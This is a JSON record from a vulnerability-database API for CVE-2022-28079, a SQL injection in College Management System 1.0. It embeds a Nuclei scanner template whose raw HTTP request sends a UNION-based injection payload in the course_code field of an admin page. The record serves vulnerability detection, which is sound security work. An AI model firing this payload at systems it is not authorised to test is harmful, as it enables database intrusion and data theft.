{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-28079/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-28079/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-28079/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-28079/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-28079/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-28079"},"sightings":{"href":"/api/v1/sightings/cve-2022-28079"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-28079.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2022-28079\n\ninfo:\n  name: College Management System 1.0 - SQL Injection\n  author: ritikchaddha\n  severity: high\n  description: |\n    College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.\n  remediation: |\n    Upgrade to the latest version to mitigate this vulnerability.\n  reference:\n    - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated\n    - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-28079\n    - https://code-projects.org/college-management-system-in-php-with-source-code/\n    - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2022-28079\n    cwe-id: CWE-89\n    epss-score: 0.28512\n    epss-percentile: 0.98066\n    cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: college_management_system_project\n    product: college_management_system\n  tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project,vkev,vuln\nvariables:\n  num: \"999999999\"\n\nhttp:\n  - raw:\n      - |\n        POST /admin/asign-single-student-subjects.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - '{{md5({{num}})}}'\n\n      - type: status\n        status:\n          - 302\n# digest: 4b0a00483046022100c5bd12958c75205730bcabe6c5ffeae8d4349544eafde56fe8614dcd73859fcd022100f6fd05abb3f4fcb336ff01afada2631dede734e68dd60c9023f3de278a756094:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-28079"}